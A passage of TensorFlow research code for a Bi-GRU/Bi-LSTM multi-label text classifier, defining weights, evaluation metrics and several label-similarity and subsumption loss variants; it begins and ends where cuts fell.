#self.loss_val = self.loss_multilabel_onto_new_simsub_pair_diff_abs(self.label_sim_matrix,self.label_sub_matrix) # j,k per document, l_sim pair_diff_abs
else:
print("going to use single label loss.")
self.loss_val = self.loss()
self.train_op = self.train()
# output evaluation results on training data
sig_output = tf.sigmoid(self.logits)
if not self.multi_label_flag:
self.predictions = tf.argmax(sig_output, axis=1, name="predictions") # shape:[None,]
correct_prediction = tf.equal(tf.cast(self.predictions, tf.int32),
self.input_y) # tf.argmax(self.logits, 1)-->[batch_size]
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name="Accuracy") # shape=()
self.precision = 0
self.recall = 0
#self.f_measure = 0
else:
self.predictions = tf.round(sig_output) #y = sign(x) = -1 if x < 0; 0 if x == 0 or tf.is_nan(x); 1 if x > 0.
#self.predictions = tf.cast(tf.greater(self.sig_logits,0.25),tf.float32)
temp = tf.cast(tf.equal(self.predictions,self.input_y_multilabel), tf.float32)
print('temp',temp)
tp = tf.reduce_sum(tf.multiply(temp,self.predictions), axis=1) # [128,1]
p = tf.reduce_sum(self.predictions, axis=1) + 1e-10 # [128,1]
t = tf.reduce_sum(self.input_y_multilabel, axis=1) # [128,1]
union = tf.reduce_sum(tf.cast(tf.greater(self.predictions + self.input_y_multilabel,0),tf.float32), axis=1) # [128,1]
self.accuracy = tf.reduce_mean(tf.div(tp,union))
self.precision = tf.reduce_mean(tf.div(tp,p))
self.recall = tf.reduce_mean(tf.div(tp,t))
self.training_loss = tf.summary.scalar("train_loss_per_batch",self.loss_val)
self.training_loss_per_epoch = tf.summary.scalar("train_loss_per_epoch",self.loss_val)
self.validation_loss = tf.summary.scalar("validation_loss_per_batch",self.loss_val)
self.validation_loss_per_epoch = tf.summary.scalar("validation_loss_per_epoch",self.loss_val)
self.writer = tf.summary.FileWriter("./logs")
def instantiate_weights(self):
"""define all weights here"""
with tf.name_scope("embedding"): # embedding matrix
self.Embedding = tf.get_variable("Embedding",shape=[self.vocab_size, self.embed_size],initializer=self.initializer) #[vocab_size,embed_size] tf.random_uniform([self.vocab_size, self.embed_size],-1.0,1.0)
self.W_projection = tf.get_variable("W_projection",shape=[self.hidden_size*2, self.num_classes],initializer=self.initializer) #[embed_size,label_size]
self.b_projection = tf.get_variable("b_projection",shape=[self.num_classes]) #[label_size]
if self.dynamic_sem == True:
print('intialise dynamic sem loss weights')
if self.lambda_sim != 0:
self.label_sim_matrix = tf.get_variable("label_sim_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
#print('label_sim_matrix initialised as label_sim_matrix_static')
if self.lambda_sub == 0:
self.label_sub_matrix = self.label_sub_matrix_static # as static weights
else:
self.label_sub_matrix = tf.get_variable("label_sub_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
else:
self.label_sim_matrix = self.label_sim_matrix_static # as static weights
if self.lambda_sub == 0:
self.label_sub_matrix = self.label_sub_matrix_static # as static weights
else:
self.label_sub_matrix = tf.get_variable("label_sub_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
with tf.name_scope("gru_weights_word_level"):
self.W_z = tf.get_variable("W_z", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_z = tf.get_variable("U_z", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_z = tf.get_variable("b_z", shape=[self.hidden_size])
# GRU parameters:reset gate related
self.W_r = tf.get_variable("W_r", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_r = tf.get_variable("U_r", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_r = tf.get_variable("b_r", shape=[self.hidden_size])
self.W_h = tf.get_variable("W_h", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_h = tf.get_variable("U_h", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_h = tf.get_variable("b_h", shape=[self.hidden_size])
#this is the original lstm implementation in https://github.com/brightmart/text_classification/blob/master/a03_TextRNN/p8_TextRNN_model.py
def inference_lstm(self):
"""main computation graph here: 1. embeddding layer, 2.Bi-LSTM layer, 3.concat, 4.FC layer 5.softmax """
#1.get emebedding of words in the sentence
self.embedded_words = tf.nn.embedding_lookup(self.Embedding,self.input_x) #shape:[None,sentence_length,embed_size]
#2. Bi-lstm layer
# define lstm cess:get lstm cell output
lstm_fw_cell=rnn.BasicLSTMCell(self.hidden_size) #forward direction cell
lstm_bw_cell=rnn.BasicLSTMCell(self.hidden_size) #backward direction cell
if self.dropout_keep_prob is not None:
lstm_fw_cell=rnn.DropoutWrapper(lstm_fw_cell,output_keep_prob=self.dropout_keep_prob)
lstm_bw_cell=rnn.DropoutWrapper(lstm_bw_cell,output_keep_prob=self.dropout_keep_prob)
# bidirectional_dynamic_rnn: input: [batch_size, max_time, input_size]
# output: A tuple (outputs, output_states)
# where outputs: A tuple (output_fw, output_bw) containing the forward and the backward rnn output `Tensor`.
outputs,_=tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell,lstm_bw_cell,self.embedded_words,dtype=tf.float32) #[batch_size,sequence_length,hidden_size] #creates a dynamic bidirectional recurrent neural network
print("outputs:===>",outputs) #outputs:(<tf.Tensor 'bidirectional_rnn/fw/fw/transpose:0' shape=(?, 5, 100) dtype=float32>, <tf.Tensor 'ReverseV2:0' shape=(?, 5, 100) dtype=float32>))
#3. concat output
output_rnn=tf.concat(outputs,axis=2) #[batch_size,sequence_length,hidden_size*2]
#self.output_rnn_last=tf.reduce_mean(output_rnn,axis=1) #[batch_size,hidden_size*2] # this is average pooling
self.output_rnn_last=output_rnn[:,-1,:] ##[batch_size,hidden_size*2] # this uses the last hidden state as the representation.
print("output_rnn_last:", self.output_rnn_last) # <tf.Tensor 'strided_slice:0' shape=(?, 200) dtype=float32>
#4. logits(use linear layer)
with tf.name_scope("output"): #inputs: A `Tensor` of shape `[batch_size, dim]`. The forward activations of the input network.
logits = tf.matmul(self.output_rnn_last, self.W_projection) + self.b_projection # [batch_size,num_classes]
return logits
# using gru instead of lstm
def inference(self):
self.embedded_words = tf.nn.embedding_lookup(self.Embedding,self.input_x)
embedded_words_reshaped = tf.reshape(self.embedded_words, shape=[-1, self.sequence_length,self.embed_size])
# 1.2 forward gru
hidden_state_forward_list = self.gru_forward_word_level(embedded_words_reshaped) # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# 1.3 backward gru
hidden_state_backward_list = self.gru_backward_word_level(embedded_words_reshaped) # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# 1.4 concat forward hidden state and backward hidden state. hidden_state: a list.len:sentence_length,element:[batch_size*num_sentences,hidden_size*2]
self.hidden_state = [tf.concat([h_forward, h_backward], axis=1) for h_forward, h_backward in
zip(hidden_state_forward_list, hidden_state_backward_list)] # hidden_state:list,len:sentence_length,element:[batch_size*num_sentences,hidden_size*2]
#self.hidden_state is a list.
print('self.hidden_state', len(self.hidden_state), self.hidden_state[0].get_shape())
self.output_rnn_last = self.hidden_state[-1] # using last hidden state
#self.output_rnn_last = self.hidden_state[0] # using first hidden state
print("output_rnn_last:", self.output_rnn_last) # <tf.Tensor 'strided_slice:0' shape=(?, 200) dtype=float32>
#4. logits(use linear layer)
with tf.name_scope("output"): #inputs: A `Tensor` of shape `[batch_size, dim]`. The forward activations of the input network.
logits = tf.matmul(self.output_rnn_last, self.W_projection) + self.b_projection # [batch_size,num_classes]
return logits
# loss for single-label classification
def loss(self, l2_lambda=0.0001): # 0.001
with tf.name_scope("loss"):
# input: `logits`:[batch_size, num_classes], and `labels`:[batch_size]
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y,
logits=self.logits); # sigmoid_cross_entropy_with_logits.#losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y,logits=self.logits)
# print("1.sparse_softmax_cross_entropy_with_logits.losses:",losses) # shape=(?,)
loss = tf.reduce_mean(losses) # print("2.loss.loss:", loss) #shape=()
l2_losses = tf.add_n(
[tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
loss = loss + l2_losses
return loss
# loss for multi-label classification (JMAN-s)
def loss_multilabel(self, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda #12 loss
self.sim_loss = tf.constant(0., dtype=tf.float32)
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses
return loss
# L_sim new: j,k per doc, \sum_d \sum_{j,k \in y_d} Sim_jk|R(S_dj)-R(S_dk)|
def loss_multilabel_onto_new_sim_pair_diff_abs(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
# only considering the similarity of co-occuring label in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
#get an index vector from y_d
label_index_2d = tf.where(label_vector)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |R(S_dj)-R(S_dk)|
pred_d_true = tf.round(s_d_true)
pair_diff_abs_d = tf.abs(tf.transpose(pred_d_true) - pred_d_true)
#gather the Sim_jk from Sim
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_abs_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim only: j,k per batch
def loss_multilabel_onto_new_sim_per_batch(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
# only considering the similarity of co-occuring label in each labelset y_d.
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True) # input_y_multilabel is a matrix \in R^{|D|,|T|}
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sim_matrix = tf.multiply(co_label_mat_batch,label_sim_matrix) # only considering the label similarity of labels in the label set for this document (here is a batch).
# sim-loss after sigmoid L_sim = sim(T_j,T_k)|s_dj-s_dk|^2
sig_output = tf.sigmoid(self.logits) # self.logit is the matrix S \in R^{|D|,|T|}
vec_square = tf.multiply(sig_output,sig_output) # element-wise multiplication
vec_square = tf.reduce_sum(vec_square,0) # an array of num_classes values {sum_d l_dj^2}_j
vec_mid = tf.matmul(tf.transpose(sig_output),sig_output)
vec_rows=tf.ones([tf.size(vec_square),1])*vec_square # copy the vector by it self to shape a square
vec_columns=tf.transpose(vec_rows)
vec_diff=vec_rows-2*vec_mid+vec_columns # (li-lj)^2=li^2-2lilj+lj^2 # vec_diff is now a matrix = {sum_d (l_di-l_dj)^2}_i,j
vec_diff=tf.multiply(vec_diff,label_sim_matrix) #sim(T_i,T_j)*(li-lj)^2 # element-wise # using the label_sim_matrix
#vec_diff=tf.multiply(vec_diff,co_label_mat_batch) # using only tag co-occurrence
vec_final=tf.reduce_sum(vec_diff)/2 # vec_diff is symmetric
#vec_final=tf.reduce_sum(vec_diff)/2/self.num_classes/self.num_classes # vec_diff is symmetric
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# sim-loss only: j,k per document - tensor operations only - requiring large GPU memory
def loss_multilabel_onto_new_sim_per_doc_tensor(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
# only considering the similarity of co-occuring label in each labelset y_d.
co_label_mat = tf.matmul(tf.expand_dims(self.input_y_multilabel,2),tf.expand_dims(self.input_y_multilabel,1)) # (128,5196,5196)
label_sim_matrix = tf.multiply(co_label_mat,tf.expand_dims(label_sim_matrix,0))
# sim-loss after sigmoid L_sim = sim(T_j,T_k)|s_dj-s_dk|^2
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
vec_diff_squared = tf.square(tf.expand_dims(sig_output,1)-tf.expand_dims(sig_output,2)) # (128,5196,5196)
vec_final = tf.reduce_sum(tf.multiply(label_sim_matrix,vec_diff_squared))/2.0
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# sim-loss only: j,k per document - with for loop operations - requiring large GPU memory [not used]
def loss_multilabel_onto_new_sim_per_doc_not_used(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
# only considering the similarity of co-occuring label in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
logit_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(logit_list)):
logit_vector = tf.expand_dims(logit_list[i],1)
logit_list[i] = tf.multiply(logit_list[i],0)
#print("logit_vector:",logit_vector)
pair_diff = tf.transpose(logit_vector) - logit_vector # pair_diff: {l_di-l_dj}_i,j
#print("pair_diff:",pair_diff)
pair_diff_squared = tf.square(pair_diff) # pair_diff_squared: {|l_di-l_dj|^2}_i,j
#print("pair_diff_squared:",pair_diff_squared)
label_vector = label_list[i]
label_list[i] = tf.multiply(label_list[i],0)
#print("label_vector:",label_vector)
label_co_doc = tf.matmul(tf.transpose(label_vector),label_vector)
#print("label_co_doc:",label_co_doc)
label_co_sim_doc = tf.multiply(label_co_doc,label_sim_matrix)
#print("label_co_sim_doc:",label_co_sim_doc)
pair_diff_weighted = tf.multiply(label_co_sim_doc,pair_diff_squared)
#print("pair_diff_weighted:",pair_diff_weighted)
self.sim_loss = self.sim_loss + tf.reduce_sum(pair_diff_weighted)
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim only: j,k per document
def loss_multilabel_onto_new_sim_per_doc(self, label_sim_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # not adding sim and/or sem matrices into the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sim_mat' not in v.name]) * l2_lambda
# only considering the similarity of co-occuring label in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |s_dj-s_dk|^2
pair_diff_squared_d = tf.square(tf.transpose(s_d_true) - s_d_true)
#gather the Sim_jk from Sim
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
#ind_flat_lower = tf.tile(label_index,[label_len])
#ind_mat = tf.reshape(ind_flat_lower,[label_len,label_len])
#ind_flat_upper = tf.reshape(tf.transpose(ind_mat),[-1])
#ind_squ = tf.transpose(tf.stack([ind_flat_upper,ind_flat_lower]))
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_squared_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sim_loss
return loss
# L_sim and L_sub - per doc - L_sim as lambda_sim*|R(S_dj)-R(S_dk)|
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hyponym of T_k.
def loss_multilabel_onto_new_simsub_pair_diff_abs(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
#get an index vector from y_d
label_index_2d = tf.where(label_vector)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |R(S_dj)-R(S_dk)|
pred_d_true = tf.round(s_d_true)
pair_diff_abs_d = tf.abs(tf.transpose(pred_d_true) - pred_d_true)
#calculate R(s_dj)(1-R(s_dk))
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sim_jk from Sim and the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_abs_d))
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sim and L_sub - per doc
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hyponym of T_k.
def loss_multilabel_onto_new_simsub_per_doc(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # not adding sim and/or sem matrices into the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sim_mat' not in v.name and 'label_sub_mat' not in v.name]) * l2_lambda
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sim_loss = 0
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#print("label_vector_bool:",label_vector_bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate |s_dj-s_dk|^2
pair_diff_squared_d = tf.square(tf.transpose(s_d_true) - s_d_true)
#calculate R(s_dj)(1-R(s_dk))
pred_d_true = tf.round(s_d_true)
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sim_jk from Sim and the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sim_matrix_d = tf.reshape(tf.gather_nd(label_sim_matrix,ind_squ),[label_len,label_len])
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sim_loss = self.sim_loss + tf.reduce_sum(tf.multiply(label_sim_matrix_d,pair_diff_squared_d))
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sim_loss=(self.sim_loss/self.batch_size)*self.lambda_sim/2.0
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sim and L_sub - per batch, used in the NAACL paper
# label_sub_matrix: sub(T_j,T_k) \in {0,1} means whether T_j is a hypernym of T_k.
def loss_multilabel_onto_new_simsub_per_batch(self, label_sim_matrix, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
